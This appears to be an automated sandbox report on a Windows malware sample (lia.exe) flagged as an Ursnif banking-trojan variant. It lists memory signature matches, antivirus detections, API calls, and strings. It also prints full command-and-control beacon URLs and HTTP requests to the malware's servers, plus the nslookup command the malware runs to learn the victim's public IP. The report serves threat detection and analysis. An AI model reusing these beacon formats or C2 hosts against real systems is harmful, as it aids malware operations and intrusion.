Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.189.12.123	io.immontyr.com	Russian Federation		50113	SUPERSERVERSDATACENTERRU	true

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
myip.opendns.com	102.129.143.64	true
resolver1.opendns.com	208.67.222.222	true
io.immontyr.com	185.189.12.123	true
apr.intooltak.com	185.189.12.123	true
222.222.67.208.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://apr.intooltak.com/GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc	true	Avira URL Cloud: malware	unknown
http://apr.intooltak.com/Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I	true	Avira URL Cloud: malware	unknown
http://io.immontyr.com/6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://apr.intooltak.com/GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc	Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I	Avira URL Cloud: Label: malware

Found malware configuration

Source: lia.exe

Multi AV Scanner detection for submitted file

Source: lia.exe	Virustotal: Detection: 64%			Perma Link
Source: lia.exe	ReversingLabs: Detection: 74%

Antivirus / Scanner detection for submitted sample

Source: lia.exe

Avira: detected

Machine Learning detection for sample

Source: lia.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.lia.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.lia.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\lia.exe

1_2_00B17479

Compliance:

Uses 32bit PE files

Source: lia.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source:	Binary string: ntdll.pdb source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.pdb source: powershell.exe, 0000000C.00000002.614202751.000001770375D000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\lia.exe

1_2_039E8409

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_039F2ECF
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_039EB9D4
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_039DE91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	44_2_036BE91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	44_2_036CB9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	44_2_036D2ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49768 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49769 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49769 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49772 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49772 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49856 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49856 -> 185.189.12.123:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Uses nslookup.exe to query domains

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine

Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: global traffic	HTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU

Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000000C.00000003.487223074.000001777B372000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.572331191.0000017700001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp	String found in binary or memory: http://twitter.com/spotifyg
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000016.00000000.543937069.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495631696.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527688751.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: apr.intooltak.com

Source: global traffic	HTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
